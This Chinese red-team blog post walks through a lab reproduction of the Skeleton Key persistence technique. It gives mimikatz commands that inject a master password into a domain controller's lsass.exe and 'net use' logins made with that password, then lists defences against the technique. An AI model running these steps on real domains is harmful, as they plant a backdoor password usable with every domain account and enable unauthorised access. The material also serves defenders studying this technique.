前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Skeleton Key(万能密码)对域内权限维持

Skeleton Key(万能密码)对域内权限维持

作者头像
渗透攻击红队
发布2020-12-14 11:40:31
1.8K0
发布2020-12-14 11:40:31
举报
文章被收录于专栏:漏洞知识库漏洞知识库

大家好,这里是 渗透攻击红队 的第 39 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

Skeleton Key

使用 Skeleton Key(万能密码),可以对域内权限进行持久化操作。

使用 mimikatz 完成注入 Skeleon Key 的操作,将 Skeleton Key 注入域控制器的 lsass.exe 进程。

万能密码

实验环境

远程系统:

  • 域名:god.org

域控制器:

  • 主机名:OWA2010CN-God
  • IP地址:192.168.3.21
  • 用户名:administrator
  • 密码:Admin12345

域成员服务器:

  • 主机名:mary-PC
  • IP地址:192.168.3.25
  • 用户名:mary
  • 密码:admin!@#45

Mimikatz 中使用 Skeleton Key

尝试以当前登录用户身份列出域控制器 C 盘共享目录中的文件:

代码语言:javascript
复制
dir \\192.168.3.21\c$

因为此时是一个普通的域用户身份,所以系统提示权限不足!

这个时候使用域管理员账号和密码进行连接:

代码语言:javascript
复制
net use \\192.168.3.21\ipc$ "Admin12345" /user:god\administrator

连接成功,这个时候就列出了域控制器 C 盘的共享目录。

之后在域控制器中以管理员权限打开 mimikatz,输入命令将 Skeleton Key 注入域控制器的 lsass.exe 进程:

代码语言:javascript
复制
# 提升权限
privilege::debug
# 注入 skeleton key
misc::skeleton

这个时候系统提示 Skeleton Key 已经注入成功,此时会在域内的所有账号中添加一个 Skeleton Key,其密码默认为:“mimikatz”。

接下来就可以了使用域内任意用户的身份配合 Skeleton Key 进行域内身份授权验证了。

在不使用域管理员原始密码的情况下,使用注入的 Skeleton Key,同样可以成功连接系统:

代码语言:javascript
复制
# 查看现有 ipc$
net use
# 将之前建立的 ipc$ 删除
net use \\192.168.3.21\ipc$ /del /y

输入命令,使用域管理员账号和 Skeleton Key 与域控制器建立 ipc$:

代码语言:javascript
复制
net use \\OWA2010CN-God\ipc$ "mimikatz" /user:god\administrator

建立成功后这样就可以列出域控制器的共享目录了!


Skeleton Key 防御措施

  • 域管理员用户要设置强密码,确保恶意代码不会在域控制器中执行。
  • 在所有域用户中启用双因子认证,例如智能卡认证。
  • 启动应用程序白名单(例如 AppLocker),以限制 mimikatz 在域控制器中的运行。

PS:因为 Skeleton Key 是被注入到 lsass.exe 进程的,所以它只存在于内存中,如果域控制器重启,注入的 Skeleton Key 将会失效。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-12-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透攻击红队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
访问管理
访问管理(Cloud Access Management,CAM)可以帮助您安全、便捷地管理对腾讯云服务和资源的访问。您可以使用CAM创建子用户、用户组和角色,并通过策略控制其访问范围。CAM支持用户和角色SSO能力,您可以根据具体管理场景针对性设置企业内用户和腾讯云的互通能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档